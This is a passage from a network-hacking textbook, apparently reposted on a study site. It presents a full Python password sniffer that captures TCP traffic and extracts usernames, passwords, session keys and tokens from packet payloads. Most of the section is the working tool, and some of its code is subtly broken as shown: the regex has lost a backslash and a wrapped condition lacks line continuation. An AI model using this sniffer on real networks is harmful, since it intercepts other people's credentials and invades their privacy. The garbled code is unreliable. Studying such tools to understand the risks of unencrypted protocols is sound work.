Menu
Home
Log in / Register
 
Home arrow Computer Science arrow Understanding Network Hacks
< Prev   CONTENTS   Next >

5.4 Password Sniffer

The danger of unencrypted protocols can most effectively be demonstrated with the help of a password sniffer. Even fellow men, that “do not have anything to hide”, recognize that the interception of their username and password is an act that endangers their privacy and they would like to avoid it if possible. Therefore we will now write a program that will try to hunt for username and password combination by matching predefined strings to the packets payload and dump them on the display. To do so, we will adapt the source code of the Sect. 5.2 only a little.

1 #!/usr/bin/python

2

3 import sys

4 import re

5 import getopt

6 import pcapy

7 from impacket.ImpactDecoder import EthDecoder, IPDecoder, TCPDecoder

8

9 # Interface to sniff on

10 dev = "eth0"

11

12 # Pcap filter

13 filter = "tcp"

14

15 # Decoder for all layers

16 eth_dec = EthDecoder()

17 ip_dec = IPDecoder()

18 tcp_dec = TCPDecoder()

19

20 # Patterns that match usernames and passwords

21 pattern = re.compile(r"""(?P<found>(USER|USERNAME|PASS|

22 PASSWORD|LOGIN|BENUTZER|PASSWORT|AUTH|

23 ACCESS|ACCESS_?KEY|SESSION|

24 SESSION_?KEY|TOKEN)[=:s].+)""",

25 re.MULTILINE|re.IGNORECASE)

26

27

28 # This function will be called for every packet, decode it and

29 # try to find a username or password in it

30 def handle_packet(hdr, data):

31 eth_pkt = eth_dec.decode(data)

32 ip_pkt = ip_dec.decode(eth_pkt.get_data_as_string ())

33 tcp_pkt = tcp_dec.decode(ip_pkt.get_data_as_string ())

34 payload = ip_pkt.get_data_as_string ()

35

36 match = re.search(pattern, payload)

37 if not tcp_pkt.get_SYN() and not tcp_pkt.get_RST() and

38 not tcp_pkt.get_FIN() and match and

39 match.groupdict()['found'] != None:

40 print "%s:%d -> %s:%d" % (ip_pkt.get_ip_src(),

41 tcp_pkt.get_th_sport(),

42 ip_pkt.get_ip_dst(),

43 tcp_pkt.get_th_dport())

44 print " %s " % (match.groupdict()['found'])

45

46

47 def usage():

48 print sys.argv[0] + " -i <dev> -f <pcap_filter>"

49 sys.exit(1)

50

51

52 # Parsing parameter

53 try:

54 cmd_opts = "f:i:"

55 opts, args = getopt.getopt(sys.argv[1:], cmd_opts)

56 except getopt.GetoptError:

57 usage()

58

59 for opt in opts:

60 if opt[0] == "-f":

61 filter = opt[1]

62 elif opt[0] == "-i":

63 dev = opt[1]

64 else:

65 usage()

66

67 # Start sniffing

68 pcap = pcapy.open_live(dev, 1500, 0, 100)

69 pcap.setfilter(filter)

70 print "Sniffing passwords on " + str(dev)

71 pcap.loop(0, handle_packet)

This time we filter TCP traffic, because the author is not aware of any UDP based protocols that have a login or authentication mechanism.

For a decoder we additionally define IPDecoder and TCPDecoder to extract the IPand TCP header by applying the function handle_packet. Therefore we provide the packet from the previous layer to the decoder, though IPDecoder gets the ETH packet, the TCPDecoder an IP packet and so forth.

The payload of the IP packet can be accessed as an ASCII-string with the help of the method get_data_as_string(), which sometimes leads to ugly undisplayable characters, especially when dumping binary data. Therefore we first match the payload against a regular expression (Sect. 3.9) to make sure it contains a string like User, Pass, Password or Login. In contrast to regular password sniffers, our sniffer does not just search in predefined protocols but in all TCP traffic and tries to detect other authentication mechanisms like session keys and cookies beside username and password combinations.

 
Found a mistake? Please highlight the word and press Shift + Enter  
< Prev   CONTENTS   Next >
 
Subjects
Accounting
Business & Finance
Communication
Computer Science
Economics
Education
Engineering
Environment
Geography
Health
History
Language & Literature
Law
Management
Marketing
Philosophy
Political science
Psychology
Religion
Sociology
Travel